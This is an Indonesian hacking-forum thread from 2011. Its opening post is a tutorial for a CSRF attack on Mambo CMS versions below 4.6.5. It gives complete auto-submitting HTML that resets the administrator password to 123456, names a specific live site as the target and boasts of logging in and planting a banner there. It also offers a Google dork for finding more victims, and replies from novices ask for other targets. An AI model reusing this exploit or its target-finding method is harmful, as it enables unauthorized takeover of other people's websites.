Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrator)

Post by **poni** » Wed Aug 31, 2011 3:00 am

Mambo adalah CMS web opensource gratis yg banyak digunakan sebagai sistem managemen website. Mambo < 4.6.5 memiliki bug CSRF (Cross Site Request Forgery) dimana hacker bisa mengubah password admin melalui script sederhana. Ingat loh, hanya versi dibawah 4.6.5 yang bisa ditembus dengan teknik ini.

Kita mulai aja yah. tool yang diperlukan hanya
[-] Notepad dan
[-] Browser

buka notepad dan masukkan script dibawah ini. atau edit sesuai target website. google dork = Mambo is Free Software released under the GNU/GPL License.

Code: Select all

<html>
<head>
 </head>
 <body onload="javascript:fireForms()">
 <script language="JavaScript">
 
function fireForms()
{
    var count = 1;
    var i=0;
 
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}
 
	</script>
<form action="http://www.classiminashost.com/administrator/index.php?option=com_users&task=editA&id=62&hidemainmenu=1" method="post" name="adminForm"> 
	
	<input type="hidden" name="name" value="Administrator" /> 
	<input type="hidden" name="username" value="admin" /> 
        <input type="hidden" name="email" value="" /> 
	<input type="hidden" name="password" value="123456" /> 
	<input type="hidden" name="password2" value="123456" /> 
	<input type="hidden" name="gid" value="25" />				
	<input type="radio" name="block" value="0" checked="checked" />
	<input type="radio" name="block" value="1" />
	<input type="radio" name="sendEmail" value="0" />
	<input type="radio" name="sendEmail" value="1" checked="checked" />

</form>

perhatikan source diatas.
target web adalah http://www.classiminashost.com
username = admin
password = 123456

itu artinya penulis mengganti password administrator di http://www.classiminashost.com dengan 123456 tanpa perlu mengetahui password sebelumnya.

simpan dengan nama hackmambo.html, disini penulis menyimpan file hackmambo.html di desktop. lalu jalankan di browser anda. perhatikan gambar berikut dibawah:

setelah hackmambo.html dijalankan di browser, maka anda akan melihat ada 4 radio button diatas. tunggu beberapa saat sampai halaman redirect dan mengirimkan pengubahan password admin ke website target.

halaman akan redirect ke http://www.classiminashost.com/administ ... mainmenu=1 . isi username dengan admin dan password 123456

Yep.. sekarang penulis berhasil masuk sebagai administrator di http://www.classiminashost.com/ yang masih menggunakan mambo bersi 4.6.2. hmm sepertinya website ini baru dibuat.

sekalian nitip logo xcode.

Code: Select all

http://www.classiminashost.com/images/stories//bannerxcode.bmp

Jepret · Post by **Jepret** » Wed Aug 31, 2011 4:31 am

Wow Bos Poni Ga ada mateee nya... mantep Gan..

bos tanya neh sy msh newbie.. ciri2 web mambo apa bos mau coba target lain.. hehehhe

onteill · Post by **onteill** » Tue Sep 06, 2011 8:16 pm

gan ane udah cobak ni tehnik..
tpi cuman masuk login formnya doang..
kgak bisa masuk ke admin situsnya..
mohon pencerahannya...

djisamsoe · Post by **djisamsoe** » Thu Sep 29, 2011 8:48 am

ijin nyimak bos..! terusin dah

andri x code · Post by **andri x code** » Fri Nov 04, 2011 11:25 pm

kak klu untuk CMS mambo yang versi 4.5.2 gimana ya??
klu aku coba metode seperti yang di atas, ngk bisa masuk kk
ada tulisan Incorrect Username, Password, or Access Level. Please try again di sana kk

*Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrator)

Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrator)

Re: Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrat

reza

Re: Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrat

Re: Hack Mambo < 4.6.5 - CSRF (Mengubah Password Administrat